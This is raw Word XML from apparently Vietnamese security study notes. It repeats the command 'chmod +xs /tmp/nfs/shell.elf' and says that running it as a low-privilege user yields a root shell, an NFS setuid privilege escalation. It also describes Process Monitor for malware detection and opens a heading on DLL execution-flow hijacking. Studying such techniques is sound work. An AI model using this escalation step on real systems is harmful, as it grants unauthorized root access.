                              <a:gd name="T13" fmla="*/ 27 h 165"/>
                              <a:gd name="T14" fmla="*/ 1 w 2000"/>
                              <a:gd name="T15" fmla="*/ 23 h 165"/>
                              <a:gd name="T16" fmla="*/ 2 w 2000"/>
                              <a:gd name="T17" fmla="*/ 20 h 165"/>
                              <a:gd name="T18" fmla="*/ 4 w 2000"/>
                              <a:gd name="T19" fmla="*/ 15 h 165"/>
                              <a:gd name="T20" fmla="*/ 27 w 2000"/>
                              <a:gd name="T21" fmla="*/ 0 h 165"/>
                              <a:gd name="T22" fmla="*/ 1973 w 2000"/>
                              <a:gd name="T23" fmla="*/ 0 h 165"/>
                              <a:gd name="T24" fmla="*/ 1998 w 2000"/>
                              <a:gd name="T25" fmla="*/ 20 h 165"/>
                              <a:gd name="T26" fmla="*/ 1999 w 2000"/>
                              <a:gd name="T27" fmla="*/ 23 h 165"/>
                              <a:gd name="T28" fmla="*/ 2000 w 2000"/>
                              <a:gd name="T29" fmla="*/ 27 h 165"/>
                              <a:gd name="T30" fmla="*/ 2000 w 2000"/>
                              <a:gd name="T31" fmla="*/ 138 h 165"/>
                              <a:gd name="T32" fmla="*/ 1999 w 2000"/>
                              <a:gd name="T33" fmla="*/ 142 h 165"/>
                              <a:gd name="T34" fmla="*/ 1998 w 2000"/>
                              <a:gd name="T35" fmla="*/ 145 h 165"/>
                              <a:gd name="T36" fmla="*/ 1996 w 2000"/>
                              <a:gd name="T37" fmla="*/ 149 h 165"/>
                              <a:gd name="T38" fmla="*/ 1994 w 2000"/>
                              <a:gd name="T39" fmla="*/ 153 h 165"/>
                              <a:gd name="T40" fmla="*/ 1988 w 2000"/>
                              <a:gd name="T41" fmla="*/ 159 h 165"/>
                              <a:gd name="T42" fmla="*/ 1985 w 2000"/>
                              <a:gd name="T43" fmla="*/ 161 h 165"/>
                              <a:gd name="T44" fmla="*/ 1981 w 2000"/>
                              <a:gd name="T45"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 h="165">
                                <a:moveTo>
                                  <a:pt x="1973" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="19" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="23"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4" y="15"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1973" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1998" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1999" y="23"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1999" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1998" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1996" y="149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1994" y="153"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1988" y="159"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1985" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1981"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0"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="-510"/>
                            <a:ext cx="5235"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C364" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00BF73E0">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>chmod +xs /tmp/nfs/shell.elf</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0" upright="1">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="00D51CAA" id="Group 44" o:spid="_x0000_s1059" style="width:261.75pt;height:9.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordorigin=",-510" coordsize="523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">
                <v:shape id="Freeform 9" o:spid="_x0000_s1060" style="position:absolute;width:2000;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="20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" path="m1973,165l27,165r-8,-2l2,145,1,142,,138,,27,1,23,2,20,4,15,27,,1973,r25,20l1999,23r1,4l2000,138r-1,4l1998,145r-2,4l1994,153r-6,6l1985,161r-4,2l1973,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1973,165;27,165;19,163;2,145;1,142;0,138;0,27;1,23;2,20;4,15;27,0;1973,0;1998,20;1999,23;2000,27;2000,138;1999,142;1998,145;1996,149;1994,153;1988,159;1985,161;1981,163" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 10" o:spid="_x0000_s1061" type="#_x0000_t202" style="position:absolute;top:-510;width:523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87C364" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00BF73E0" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00BF73E0">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>chmod +xs /tmp/nfs/shell.elf</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94126B" w14:textId="00B7A43C" w:rsidR="00BF73E0" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5568"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AB954AB" wp14:editId="073227A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3087370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>92075</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270000" cy="104775"/>
                <wp:effectExtent l="1270" t="7620" r="5080" b="19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4775"/>
                          <a:chOff x="4862" y="145"/>
                          <a:chExt cx="2000" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="42" name="Freeform 135"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4862" y="144"/>
                            <a:ext cx="2000" cy="165"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6835 4862"/>
                              <a:gd name="T1" fmla="*/ T0 w 2000"/>
                              <a:gd name="T2" fmla="+- 0 310 145"/>
                              <a:gd name="T3" fmla="*/ 310 h 165"/>
                              <a:gd name="T4" fmla="+- 0 4889 4862"/>
                              <a:gd name="T5" fmla="*/ T4 w 2000"/>
                              <a:gd name="T6" fmla="+- 0 310 145"/>
                              <a:gd name="T7" fmla="*/ 310 h 165"/>
                              <a:gd name="T8" fmla="+- 0 4882 4862"/>
                              <a:gd name="T9" fmla="*/ T8 w 2000"/>
                              <a:gd name="T10" fmla="+- 0 308 145"/>
                              <a:gd name="T11" fmla="*/ 308 h 165"/>
                              <a:gd name="T12" fmla="+- 0 4865 4862"/>
                              <a:gd name="T13" fmla="*/ T12 w 2000"/>
                              <a:gd name="T14" fmla="+- 0 290 145"/>
                              <a:gd name="T15" fmla="*/ 290 h 165"/>
                              <a:gd name="T16" fmla="+- 0 4863 4862"/>
                              <a:gd name="T17" fmla="*/ T16 w 2000"/>
                              <a:gd name="T18" fmla="+- 0 287 145"/>
                              <a:gd name="T19" fmla="*/ 287 h 165"/>
                              <a:gd name="T20" fmla="+- 0 4862 4862"/>
                              <a:gd name="T21" fmla="*/ T20 w 2000"/>
                              <a:gd name="T22" fmla="+- 0 283 145"/>
                              <a:gd name="T23" fmla="*/ 283 h 165"/>
                              <a:gd name="T24" fmla="+- 0 4862 4862"/>
                              <a:gd name="T25" fmla="*/ T24 w 2000"/>
                              <a:gd name="T26" fmla="+- 0 171 145"/>
                              <a:gd name="T27" fmla="*/ 171 h 165"/>
                              <a:gd name="T28" fmla="+- 0 4889 4862"/>
                              <a:gd name="T29" fmla="*/ T28 w 2000"/>
                              <a:gd name="T30" fmla="+- 0 145 145"/>
                              <a:gd name="T31" fmla="*/ 145 h 165"/>
                              <a:gd name="T32" fmla="+- 0 6835 4862"/>
                              <a:gd name="T33" fmla="*/ T32 w 2000"/>
                              <a:gd name="T34" fmla="+- 0 145 145"/>
                              <a:gd name="T35" fmla="*/ 145 h 165"/>
                              <a:gd name="T36" fmla="+- 0 6862 4862"/>
                              <a:gd name="T37" fmla="*/ T36 w 2000"/>
                              <a:gd name="T38" fmla="+- 0 171 145"/>
                              <a:gd name="T39" fmla="*/ 171 h 165"/>
                              <a:gd name="T40" fmla="+- 0 6862 4862"/>
                              <a:gd name="T41" fmla="*/ T40 w 2000"/>
                              <a:gd name="T42" fmla="+- 0 283 145"/>
                              <a:gd name="T43" fmla="*/ 283 h 165"/>
                              <a:gd name="T44" fmla="+- 0 6862 4862"/>
                              <a:gd name="T45" fmla="*/ T44 w 2000"/>
                              <a:gd name="T46" fmla="+- 0 287 145"/>
                              <a:gd name="T47" fmla="*/ 287 h 165"/>
                              <a:gd name="T48" fmla="+- 0 6860 4862"/>
                              <a:gd name="T49" fmla="*/ T48 w 2000"/>
                              <a:gd name="T50" fmla="+- 0 290 145"/>
                              <a:gd name="T51" fmla="*/ 290 h 165"/>
                              <a:gd name="T52" fmla="+- 0 6858 4862"/>
                              <a:gd name="T53" fmla="*/ T52 w 2000"/>
                              <a:gd name="T54" fmla="+- 0 294 145"/>
                              <a:gd name="T55" fmla="*/ 294 h 165"/>
                              <a:gd name="T56" fmla="+- 0 6856 4862"/>
                              <a:gd name="T57" fmla="*/ T56 w 2000"/>
                              <a:gd name="T58" fmla="+- 0 297 145"/>
                              <a:gd name="T59" fmla="*/ 297 h 165"/>
                              <a:gd name="T60" fmla="+- 0 6850 4862"/>
                              <a:gd name="T61" fmla="*/ T60 w 2000"/>
                              <a:gd name="T62" fmla="+- 0 303 145"/>
                              <a:gd name="T63" fmla="*/ 303 h 165"/>
                              <a:gd name="T64" fmla="+- 0 6847 4862"/>
                              <a:gd name="T65" fmla="*/ T64 w 2000"/>
                              <a:gd name="T66" fmla="+- 0 305 145"/>
                              <a:gd name="T67" fmla="*/ 305 h 165"/>
                              <a:gd name="T68" fmla="+- 0 6843 4862"/>
                              <a:gd name="T69" fmla="*/ T68 w 2000"/>
                              <a:gd name="T70" fmla="+- 0 308 145"/>
                              <a:gd name="T71" fmla="*/ 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0" h="165">
                                <a:moveTo>
                                  <a:pt x="1973" y="165"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="165"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20" y="163"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1973" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000" y="26"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000" y="138"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2000" y="142"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1998" y="145"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1996" y="149"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1994" y="152"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1988" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1985" y="160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1981"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36"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4862" y="144"/>
                            <a:ext cx="20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EEFB" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                                <w:t>chmod +xs /tmp/nfs/shell.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54AB" id="Group 41" o:spid="_x0000_s1062" style="position:absolute;margin-left:243.1pt;margin-top:7.25pt;width:100pt;height:8.25pt;z-index:-251637760;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4862,145" coordsize="200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">
                <v:shape id="Freeform 135" o:spid="_x0000_s1063" style="position:absolute;left:4862;top:144;width:2000;height:165;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="20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" path="m1973,165l27,165r-7,-2l3,145,1,142,,138,,26,27,,1973,r27,26l2000,138r,4l1998,145r-2,4l1994,152r-6,6l1985,160r-4,3l1973,165xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1973,310;27,310;20,308;3,290;1,287;0,283;0,171;27,145;1973,145;2000,171;2000,283;2000,287;1998,290;1996,294;1994,297;1988,303;1985,305;1981,308" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 136" o:spid="_x0000_s1064" type="#_x0000_t202" style="position:absolute;left:4862;top:144;width:20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93CEEFB" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>chmod +xs /tmp/nfs/shell.elf</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Quay</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ảo</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>với</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>quyền</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thấp,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:r w:rsidR="00BF73E0">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF73E0" w:rsidRPr="00BF73E0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>chmod +xs /tmp/nfs/shell.elf</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610A109" w14:textId="6D6C9B70" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5568"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="108" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và có 1 root</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEA326"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p>
    <w:p w14:paraId="3E45B46A" w14:textId="2F05941B" w:rsidR="002D4A21" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>----------------------------------------------- (Sys  internal suitl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F8E14" w14:textId="709F794B" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478D3890" w14:textId="5E31FA9A" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Process Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67BF7C" w14:textId="03B0C8DA" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30160E2A" w14:textId="6B1AFBF6" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đây là công cụ giám sát và theo dõi giàn h cho HĐH Windows bằng cách ghi lại các hành động liên quan tới file hệ thống, registry, process/thread trong real time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540E9BB" w14:textId="411C9E36" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B653A0" w14:textId="417D1D2F" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Là công cụ   hữu ích hỗ trợ quá trình phát hiện Malware, phần mềm độc hại hoặc muốn theo dõi hành vi của bất kỳ chương trình nào đang tác động tới hệ thống. ProcessMon cung cấp các cơ chế lọc cho phép tập trung vào việc theo dõi các đối tượng cụ thể theo nhiều tiêu chí</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D56E0F" w14:textId="1B6A4542" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Hijack Execution Flow- luồng thực thi xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFC42D" w14:textId="62CC997F" w:rsidR="00BF73E0" w:rsidRPr="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DLL ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35AD0A" w14:textId="4EBA0DA1" w:rsidR="00BF73E0" w:rsidRDefault="00BF73E0" w:rsidP="00BF73E0">
      <w:r>
